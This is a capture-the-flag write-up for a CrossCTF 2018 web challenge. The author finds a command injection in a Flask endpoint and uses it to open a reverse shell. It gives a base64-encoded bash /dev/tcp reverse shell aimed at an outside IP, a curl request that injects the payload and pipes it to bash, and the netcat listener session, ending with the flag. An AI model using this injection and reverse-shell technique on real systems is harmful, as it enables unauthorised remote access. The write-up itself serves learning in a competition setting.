CrossCTF_2018: the Terminal

Category: Web Points: 401 Description:

How long more can you stand it? http://ctf.pwn.sg:4083

Write-up

This challenge was really fun. Firstly, accessing the challenge gives us a futuristic-like terminal and some cryptic messages,

Screen-Shot-2018-06-19-at-3.29.17-PM

What does those mean? Well, looking at our network console, we find requests to other URLs,

Screen-Shot-2018-06-19-at-3.31.21-PM

Looking at the output, that seems strangely like Unix's date command output, let's see if we can spoof that request and try something else like ls.

Screen-Shot-2018-06-19-at-3.34.00-PM

Oh look, that's nice, let's see if we can spawn a reverse shell and call it a day? Well, attempting an unescaped bash reverse shell proved fruitless since / does not play nice with Flask, so we can use base64 to encode our command and pipe it through to bash on the server!

$ echo 'bash -i >& /dev/tcp/188.166.248.233/31337 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xODguMTY2LjI0OC4yMzMvMzEzMzcgMD4mMQo=

Now that we have our payload, we can move on to encoding it with spaces and trying to get our reverse shell

$ curl 'http://ctf.pwn.sg:4082/picturise/echo%20YmFzaCAtaSA+JiAvZGV2L3RjcC8xODguMTY2LjI0OC4yMzMvMzEzMzcgMD4mMQo=%20|%20base64%20-d%20|%20bash'

On our server side,

$ nc -nvlp 31337 listening on [any] 31337 ... connect to [192.168.254.1] from (UNKNOWN) [159.89.197.64] 35774 bash: /root/.bashrc: Permission denied theterminal@9d629bb237f6:/backend$

Woot! Let's see if we can get a flag!

$ nc -nvlp 31337
listening on [any] 31337 ...
connect to [192.168.254.1] from (UNKNOWN) [159.89.197.64] 35776
bash: /root/.bashrc: Permission denied
theterminal@9d629bb237f6:/backend$ cd /home
cd /home
theterminal@9d629bb237f6:/home$ ls
ls
theterminal
theterminal@9d629bb237f6:/home$ cd theterminal
cd theterminal
theterminal@9d629bb237f6:/home/theterminal$ ls
ls
the_flag_is_here_not_elsewhere
theterminal@9d629bb237f6:/home/theterminal$ cat the_flag_is_here_not_elsewhere
cat the_flag_is_here_not_elsewhere
CrossCTF{C4ther1ne_zet4_j0n3s_w4s_1n_l0st_1n_tr4nsl4t1on}

Therefore, the flag is CrossCTF{C4ther1ne_zet4_j0n3s_w4s_1n_l0st_1n_tr4nsl4t1on}

results matching ""

    No results matching ""